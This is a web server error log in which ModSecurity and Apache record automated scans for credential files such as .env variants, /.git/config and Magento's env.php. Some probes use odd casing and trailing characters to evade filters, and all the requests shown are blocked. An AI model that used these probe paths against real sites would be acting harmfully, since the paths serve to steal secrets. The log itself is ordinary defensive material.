[Wed Feb 19 10:28:18.561745 2025] [:error] [pid 1258388] [client 92.118.39.228:2312] [client 92.118.39.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "Z7WkMgzqEFiMFYV11ByxRAAAAAM"], referer: https://www.google.com/
[Wed Feb 19 10:28:18.562198 2025] [:error] [pid 1258388] [client 92.118.39.228:2312] [client 92.118.39.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "Z7WkMgzqEFiMFYV11ByxRAAAAAM"], referer: https://www.google.com/
[Wed Feb 19 10:28:18.704531 2025] [:error] [pid 1259335] [client 92.118.39.228:2324] [client 92.118.39.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "Z7WkMoC8jifnO0kJgZgwSgAAAAk"], referer: https://www.google.com/
[Wed Feb 19 10:28:18.705463 2025] [:error] [pid 1259335] [client 92.118.39.228:2324] [client 92.118.39.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "Z7WkMoC8jifnO0kJgZgwSgAAAAk"], referer: https://www.google.com/
[Wed Feb 19 10:28:18.705896 2025] [:error] [pid 1259335] [client 92.118.39.228:2324] [client 92.118.39.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "Z7WkMoC8jifnO0kJgZgwSgAAAAk"], referer: https://www.google.com/
[Wed Feb 19 10:54:04.210655 2025] [:error] [pid 1259335] [client 193.41.206.50:57864] [client 193.41.206.50] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z7WqPIC8jifnO0kJgZgwSwAAAAk"]
[Wed Feb 19 10:54:04.211436 2025] [:error] [pid 1259335] [client 193.41.206.50:57864] [client 193.41.206.50] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z7WqPIC8jifnO0kJgZgwSwAAAAk"]
[Wed Feb 19 10:54:04.211932 2025] [:error] [pid 1259335] [client 193.41.206.50:57864] [client 193.41.206.50] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z7WqPIC8jifnO0kJgZgwSwAAAAk"]
[Wed Feb 19 10:54:14.323435 2025] [:error] [pid 1258425] [client 193.41.206.50:35374] [client 193.41.206.50] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "Z7WqRiMcT3_Z2BZK5CWdPQAAAAU"]
[Wed Feb 19 10:54:14.324074 2025] [:error] [pid 1258425] [client 193.41.206.50:35374] [client 193.41.206.50] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "Z7WqRiMcT3_Z2BZK5CWdPQAAAAU"]
[Wed Feb 19 10:54:14.324527 2025] [:error] [pid 1258425] [client 193.41.206.50:35374] [client 193.41.206.50] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "Z7WqRiMcT3_Z2BZK5CWdPQAAAAU"]
[Wed Feb 19 10:54:25.332185 2025] [:error] [pid 1259202] [client 193.41.206.50:43420] [client 193.41.206.50] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "Z7WqUbfTDZoQXGqhAzbFzwAAAAc"]
[Wed Feb 19 10:54:25.332806 2025] [:error] [pid 1259202] [client 193.41.206.50:43420] [client 193.41.206.50] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "Z7WqUbfTDZoQXGqhAzbFzwAAAAc"]
[Wed Feb 19 10:54:25.333281 2025] [:error] [pid 1259202] [client 193.41.206.50:43420] [client 193.41.206.50] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "Z7WqUbfTDZoQXGqhAzbFzwAAAAc"]
[Wed Feb 19 10:54:25.635786 2025] [:error] [pid 1258387] [client 193.41.206.50:43424] [client 193.41.206.50] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "Z7WqUSBRyX0ZmcdTTScgTgAAAAI"]
[Wed Feb 19 10:54:25.636491 2025] [:error] [pid 1258387] [client 193.41.206.50:43424] [client 193.41.206.50] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "Z7WqUSBRyX0ZmcdTTScgTgAAAAI"]
[Wed Feb 19 10:54:25.636974 2025] [:error] [pid 1258387] [client 193.41.206.50:43424] [client 193.41.206.50] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "Z7WqUSBRyX0ZmcdTTScgTgAAAAI"]
[Wed Feb 19 10:54:25.819389 2025] [:error] [pid 1258389] [client 193.41.206.50:43432] [client 193.41.206.50] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /login/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/login/.env"] [unique_id "Z7WqUY5l_i530XSrJBnIhAAAAAQ"]
[Wed Feb 19 10:54:25.820094 2025] [:error] [pid 1258389] [client 193.41.206.50:43432] [client 193.41.206.50] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/login/.env"] [unique_id "Z7WqUY5l_i530XSrJBnIhAAAAAQ"]
[Wed Feb 19 10:54:25.820687 2025] [:error] [pid 1258389] [client 193.41.206.50:43432] [client 193.41.206.50] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/login/.env"] [unique_id "Z7WqUY5l_i530XSrJBnIhAAAAAQ"]
[Wed Feb 19 10:54:26.027302 2025] [:error] [pid 1259203] [client 193.41.206.50:43446] [client 193.41.206.50] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/local/.env"] [unique_id "Z7WqUsO0jkjfdQXx8it8JQAAAAg"]
[Wed Feb 19 10:54:26.027890 2025] [:error] [pid 1259203] [client 193.41.206.50:43446] [client 193.41.206.50] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/local/.env"] [unique_id "Z7WqUsO0jkjfdQXx8it8JQAAAAg"]
[Wed Feb 19 10:54:26.028351 2025] [:error] [pid 1259203] [client 193.41.206.50:43446] [client 193.41.206.50] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/local/.env"] [unique_id "Z7WqUsO0jkjfdQXx8it8JQAAAAg"]
[Wed Feb 19 10:54:26.225673 2025] [:error] [pid 1258386] [client 193.41.206.50:43460] [client 193.41.206.50] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "Z7WqUqAIC5wiEYk6JNGCYQAAAAE"]
[Wed Feb 19 10:54:26.226299 2025] [:error] [pid 1258386] [client 193.41.206.50:43460] [client 193.41.206.50] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "Z7WqUqAIC5wiEYk6JNGCYQAAAAE"]
[Wed Feb 19 10:54:26.226845 2025] [:error] [pid 1258386] [client 193.41.206.50:43460] [client 193.41.206.50] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "Z7WqUqAIC5wiEYk6JNGCYQAAAAE"]
[Wed Feb 19 10:54:26.409666 2025] [authz_core:error] [pid 1258388] [client 193.41.206.50:43462] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Wed Feb 19 10:54:26.641076 2025] [:error] [pid 1259335] [client 193.41.206.50:43464] [client 193.41.206.50] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "Z7WqUoC8jifnO0kJgZgwTAAAAAk"]
[Wed Feb 19 10:54:26.641589 2025] [:error] [pid 1259335] [client 193.41.206.50:43464] [client 193.41.206.50] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "Z7WqUoC8jifnO0kJgZgwTAAAAAk"]
[Wed Feb 19 10:54:26.641975 2025] [:error] [pid 1259335] [client 193.41.206.50:43464] [client 193.41.206.50] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "Z7WqUoC8jifnO0kJgZgwTAAAAAk"]
[Fri Feb 21 20:54:08.372877 2025] [:error] [pid 1307423] [client 52.66.240.57:44708] [client 52.66.240.57] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z7jZ4PNF8uNAT_IfKxnXWQAAAAE"]
[Fri Feb 21 20:54:08.374592 2025] [:error] [pid 1307423] [client 52.66.240.57:44708] [client 52.66.240.57] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z7jZ4PNF8uNAT_IfKxnXWQAAAAE"]
[Fri Feb 21 20:54:08.375091 2025] [:error] [pid 1307423] [client 52.66.240.57:44708] [client 52.66.240.57] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z7jZ4PNF8uNAT_IfKxnXWQAAAAE"]
[Sat Feb 22 14:37:49.394749 2025] [:error] [pid 1324877] [client 52.66.240.57:51900] [client 52.66.240.57] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z7nTLfEC0wnK7F1RxU-IOAAAAFA"]
[Sat Feb 22 14:37:49.395396 2025] [:error] [pid 1324877] [client 52.66.240.57:51900] [client 52.66.240.57] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z7nTLfEC0wnK7F1RxU-IOAAAAFA"]
[Sat Feb 22 14:37:49.395878 2025] [:error] [pid 1324877] [client 52.66.240.57:51900] [client 52.66.240.57] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z7nTLfEC0wnK7F1RxU-IOAAAAFA"]
[Sat Feb 22 20:29:21.498579 2025] [authz_core:error] [pid 1324801] [client 185.246.189.156:42080] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:29:21.661826 2025] [authz_core:error] [pid 1324875] [client 185.246.189.156:42090] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:29:34.556441 2025] [authz_core:error] [pid 1324878] [client 185.246.189.156:60512] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:29:37.473396 2025] [authz_core:error] [pid 1324874] [client 185.246.189.156:59854] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php;, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:29:37.929178 2025] [authz_core:error] [pid 1324879] [client 185.246.189.156:59862] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/eNv.php, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:29:37.962382 2025] [authz_core:error] [pid 1324877] [client 185.246.189.156:59872] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.pHp, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:29:45.060561 2025] [authz_core:error] [pid 1324877] [client 185.246.189.156:59954] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:29:45.459079 2025] [authz_core:error] [pid 1324872] [client 185.246.189.156:59966] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:29:45.667885 2025] [authz_core:error] [pid 1324876] [client 185.246.189.156:59934] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php!, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:29:46.278534 2025] [authz_core:error] [pid 1324873] [client 185.246.189.156:59938] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php@, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:29:46.593847 2025] [authz_core:error] [pid 1324875] [client 185.246.189.156:59988] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php:, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:29:46.595900 2025] [authz_core:error] [pid 1324770] [client 185.246.189.156:59974] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php$, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:29:55.252156 2025] [authz_core:error] [pid 1324878] [client 185.246.189.156:33838] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php&, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:29:56.287665 2025] [authz_core:error] [pid 1324874] [client 185.246.189.156:33826] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php^, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:29:56.453916 2025] [authz_core:error] [pid 1324877] [client 185.246.189.156:33868] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php(, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:29:56.977084 2025] [authz_core:error] [pid 1324872] [client 185.246.189.156:33872] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php), referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:29:57.481280 2025] [authz_core:error] [pid 1324873] [client 185.246.189.156:33854] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php%, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:29:57.674933 2025] [authz_core:error] [pid 1324876] [client 185.246.189.156:33878] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php*, referer: https://economiasolidale.38121.it/
